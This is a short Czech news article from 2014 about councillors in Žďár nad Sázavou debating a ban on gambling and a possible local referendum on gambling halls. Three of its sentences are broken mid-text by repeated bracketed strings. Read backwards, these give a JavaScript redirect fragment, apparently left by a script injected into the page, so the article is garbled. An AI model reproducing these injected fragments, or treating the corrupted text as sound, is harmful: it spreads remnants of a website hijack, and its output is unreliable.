zákaz hazardu
Rainbow page separator

Zastupitelé projednají návrh zákazu hazardu

Úterý, 26. srpna 2014

Hazard

Žďár nad Sázavou / Návrh na zákaz hazardu ve městě projednají 4. září žďárští zastupitelé. Pokud se shodnou, vyhláška zakazující provozování sázkových her, loterií a jiných podobných her na území Žďáru nad Sázavou by pak mohla začít platit už od začátku října. A [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to s tím, že by zakázala povolování nových přístrojů; přičemž ty stávající by byly provozovány do doby, kterou jim stanovuje vydané povolení.
„Zastupitelstvo rovněž projedná návrh vyhlášení místního referenda týkajícího se heren ve městě,“ informovala starostka Žďáru nad Sázavou Dagmar Zvěřinová.
V případě, že by se místní referendum ve Žďáře uskutečnilo, podle platných pravidel [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to musí být do devadesáti dnů od jeho vyhlášení. Což by korespondovalo s předchozími úvahami o [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tom, aby se případné referendum o zákazu hazardu na území města konalo současně s komunálními volbami ve dnech 10. a. 11. října.